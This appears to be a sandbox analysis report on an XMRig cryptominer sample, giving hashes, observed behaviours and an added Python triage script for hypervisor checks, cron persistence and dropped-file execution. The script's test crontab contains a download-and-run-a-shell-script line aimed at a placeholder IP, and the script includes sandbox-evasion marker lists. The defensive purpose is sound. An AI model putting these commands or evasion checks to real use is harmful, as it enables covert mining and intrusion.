General

  • Target

    5531f59f87bca7e0c35846051362d51de071afb8533a55a248b0af4650465a5f.elf

  • Size

    918KB

  • Sample

    241117-ptre8syrgt

  • MD5

    70a741de589e0538307850cf036bde70

  • SHA1

    a35398ef7cf835937c30f1c60d3db82f035dcb47

  • SHA256

    5531f59f87bca7e0c35846051362d51de071afb8533a55a248b0af4650465a5f

  • SHA512

    f4f3747b49792e217056c19d1d5add4d4b1c6aa37ef2aa7c8914d0f9f3bfcb0db22444b9879b32f4d2706537bef26577d566e8c1ad1768cc0fd5834c70d0d5b4

  • SSDEEP

    12288:zRwB0BGilgQ0UrlPkui3hp4CUSpLPo7EuozpyyUbRkoXd:zRwB0jgQ0UrFkuiRp45+LPoL1k6

Targets

    • Target

      5531f59f87bca7e0c35846051362d51de071afb8533a55a248b0af4650465a5f.elf


    • XMRig Miner payload

    • Xmrig family

    • xmrig

      XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

    • File and Directory Permissions Modification

      Adversaries may modify file or directory permissions to evade defenses.

    • Executes dropped EXE

    • Checks hardware identifiers (DMI)

      Reads DMI information (system vendor, product name, BIOS vendor) that indicates whether the system is a virtual machine, a common sandbox-evasion check.

    • Creates/modifies Cron job

      Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    • Enumerates running processes

      Discovers information about the processes currently running on the system.

    • Reads hardware information

      Accesses system information such as serial numbers and manufacturer names.
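The signatures above describe behaviour observed in the sandbox but not how to recognise it on a host. The following Python script is an added example, not output of the sandbox or code from the XMRig project: it reproduces the DMI-based virtual-machine check in the form a sample like this one performs it, and then runs two host-side detections over constructed input, one for the cron-job persistence and one for the "chmod then execute a dropped file" sequence. The DMI values, the crontab lines, the audit-style log format and the path /tmp/.x/kthreadd are all constructed for the example; the audit log in particular is a simplified one-line-per-syscall form, not real auditd output.

```python
"""Triage helpers for the behaviours listed in this report (added example).

Everything below is constructed for illustration: the DMI dictionaries,
the crontab text, the audit-style log and the path /tmp/.x/kthreadd are
not taken from the sample.
"""
import re

# DMI strings that identify common hypervisors. A sample typically reads
# /sys/class/dmi/id/{sys_vendor,product_name,bios_vendor} (or dmidecode
# output) and compares the contents against a list like this one.
VM_DMI_MARKERS = (
    "qemu", "kvm", "bochs", "vmware", "virtualbox", "innotek gmbh",
    "xen", "parallels", "virtual machine", "hyper-v", "cloud hypervisor",
)


def dmi_indicates_vm(dmi):
    """Return the first hypervisor marker found in the DMI strings, or None.

    `dmi` maps a /sys/class/dmi/id file name to its (stripped) content.
    """
    blob = " ".join(v.lower() for v in dmi.values())
    for marker in VM_DMI_MARKERS:
        if marker in blob:
            return marker
    return None


# Crontab commands that run from temp or hidden directories, or that pipe
# a download straight into a shell, are the usual shape of miner persistence.
SUSPICIOUS_PATH = re.compile(
    r"(^|\s)(/tmp|/var/tmp|/dev/shm|/root/\.|/home/[^/]+/\.)[^\s;|&]*")
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def suspicious_cron_entries(crontab_text):
    """Return (line, reason) tuples for crontab lines worth a closer look."""
    findings = []
    for line in crontab_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if DOWNLOAD_EXEC.search(s):
            findings.append((s, "download piped to shell"))
        elif SUSPICIOUS_PATH.search(s):
            findings.append((s, "runs from temp or hidden directory"))
    return findings


# Constructed one-syscall-per-line format: "<ts> pid=<n> syscall=<name>
# path=<p> [mode=<octal>]". Real auditd records need parsing first.
AUDIT_LINE = re.compile(
    r"^(?P<ts>\S+) pid=(?P<pid>\d+) syscall=(?P<sc>\w+) "
    r"path=(?P<path>\S+)(?: mode=(?P<mode>[0-7]+))?")


def dropped_and_executed(audit_text):
    """Return paths that were written, made executable and then executed.

    Correlation is by path only; the dropper usually forks before execve,
    so correlating by pid would miss the child.
    """
    written, executable, hits = set(), set(), []
    for line in audit_text.splitlines():
        m = AUDIT_LINE.match(line)
        if not m:
            continue
        sc, path, mode = m["sc"], m["path"], m["mode"]
        if sc in ("openat", "write"):
            written.add(path)
        elif sc in ("chmod", "fchmodat") and mode and int(mode, 8) & 0o111:
            executable.add(path)
        elif sc == "execve" and path in written and path in executable:
            hits.append(path)
    return hits


# Constructed inputs.
SAMPLE_DMI = {            # what a QEMU/KVM sandbox typically reports
    "sys_vendor": "QEMU",
    "product_name": "Standard PC (Q35 + ICH9, 2009)",
    "bios_vendor": "SeaBIOS",
}
BARE_METAL_DMI = {
    "sys_vendor": "Dell Inc.",
    "product_name": "PowerEdge R740",
    "bios_vendor": "Dell Inc.",
}
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /tmp/.x/kthreadd >/dev/null 2>&1
@reboot curl -fsSL http://203.0.113.10/a.sh | sh
"""
SAMPLE_AUDIT = """\
2024-11-17T12:00:01Z pid=1412 syscall=openat path=/tmp/.x/kthreadd
2024-11-17T12:00:01Z pid=1412 syscall=chmod path=/tmp/.x/kthreadd mode=0755
2024-11-17T12:00:02Z pid=1413 syscall=execve path=/tmp/.x/kthreadd
2024-11-17T12:00:02Z pid=1413 syscall=execve path=/usr/bin/crontab
"""

if __name__ == "__main__":
    print("sandbox DMI  ->", dmi_indicates_vm(SAMPLE_DMI))
    print("bare metal   ->", dmi_indicates_vm(BARE_METAL_DMI))
    for entry, reason in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", reason, "::", entry)
    print("dropped+exec ->", dropped_and_executed(SAMPLE_AUDIT))
```

The DMI check is the reason a sample that evades detection in a hypervisor-backed sandbox can still run on bare metal; when re-running it for analysis, either spoof the /sys/class/dmi/id values or run on hardware. The cron and audit detections are deliberately narrow pattern matches over constructed input and should be tuned to the host's own cron hygiene and audit rules before use.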

MITRE ATT&CK Enterprise v15